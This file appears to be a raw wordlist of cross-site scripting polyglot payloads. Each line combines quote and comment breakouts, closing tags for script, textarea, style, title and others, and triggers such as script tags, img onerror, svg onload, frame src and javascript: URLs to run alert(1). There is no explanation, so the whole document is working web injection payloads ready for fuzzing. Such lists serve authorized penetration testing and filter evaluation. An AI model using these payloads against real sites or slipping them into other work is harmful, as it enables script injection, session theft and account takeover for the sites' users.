';alert(1)//';alert(1)//";alert(1)//";alert(1)//--></SCRIPT>">'><SCRIPT>alert(1)</SCRIPT>
jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert(1)//&gt;\x3e>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//>
javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//
javascript:alert(1)/*`/*\/*'/*\"/*"/**/(alert(1))// alert(1)//--></template><frame/onload=alert(1) <img src=x onerror=alert(1)></style/</title/</textarea/</noscript/</noembed/</script><script>alert(1)</script>
javascript:alert(1)//*/alert(1)/*'-/"/-eval(`(alert(1))`)//\"-alert(1)//--></title></style></noscript></textarea></template></noembed><script>alert(1)</script><frameset onload=alert(1)><svg/onload=alert(1)> alert(1)//
javascript:alert(1)//\";alert(1);/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert(1);"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert(1)><svg/onload=alert(1)> alert(1)//
javascript:alert(1)//'//"//\"; '/`/*\/*'/*"/**/(alert(1))//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert(1)><script>alert(1)</script>
javascript:alert(1)//'//"//\"//-->`//*/ alert(1);//</title></textarea></style></noscript></noembed></template><frame onload=alert(1)></select></script><<svg onload=alert(1)>
javascript:alert(1)//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert(1)>\">alert(1)//*/ alert(1)//<frame src=javascript:alert(1)>
javascript:alert(1)//<frame/src=javascript:alert(1)><svg/onload=alert(1)>`;alert(1)`';alert(1)//\";alert(1);//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert(1)>*/ alert(1)//*
javascript:alert(1);//<img src=x:x onerror=alert(1)>\";alert(1);//";alert(1);//';alert(1);//`;alert(1);// alert(1);//*/alert(1);//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert(1)><svg onload=alert(1)><!--
javascript:alert(1)//--></script></textarea></style></title><a"//' onclick=alert(1)//>*/alert(1)/*
javascript:alert(1)//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert(1)>"><frame/onload=alert(1)>*/ alert(1)//
javascript:alert(1)//\ /*<svg/onload=';alert(1);'></textarea></style></title></noscript></template></noembed><frame onload=";alert(1);"></script>--><script>alert(1);alert(1);</script>*/alert(1)//\";alert(1)//
javascript:alert(1);//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert(1)//'-->\" alert(1);/*`/**/(/**/alert(1))//<script>alert(1)</script><<svg onload=alert(1)>>
javascript:alert(1)//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert(1)></script>*///\"//`//'//"//><svg <svg onload=alert(1)> alert(1)//
javascript:alert(1)//</title></style></textarea></noscript></template></noembed><script>alert(1)</script>-->\";alert(1)//";alert(1)//';alert(1)//<script>alert(1)</script><frame src="javascript:alert(1)">` alert(1)//<svg/onload=alert(1)>*/alert(1)/*
javascript:alert(1)//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert(1)//<frame onload=alert(1)><<script>alert(1)<</script>
javascript:alert(1)//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert(1)></script><script>/*<svg onload=alert(1)>*/ alert(1)//</script>
javascript:/*"/*'/*`/*\"/**/ alert(1)//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert(1)><frame src=javascript:alert(1)>
javascript:"/*'/*\"/*` /**/alert(1)//--></title></textarea></style></noscript></noembed></template></script><script>alert(1)</script><svg/<frame/onload=alert(1)>
javascript:alert(1)"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert(1)//</script>
javascript:/*"/*`/*'/*\"/*-->*/ alert(1)//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert(1)><<svg/onload=alert(1)>
javascript:/*"/*\"/*`/*'/**/ (alert(1))//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert(1)--><<svg/onload=alert(1)>
javascript:/*`/*'/*'/*"-/*\"/**/ alert(1)//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert(1)><frame/src=javascript:alert(1)>
javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert(1)></template </textarea </title </style </noscript </noembed </script --><<script>alert(1)<</script>\ /**/alert(1)//
javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert(1)//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert(1)//</script>
javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert(1)><<svg/onload= /**/alert(1)//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(1)//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert(1)//&gt;\x3e>
javascript:alert(1)//\";alert(1);/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//

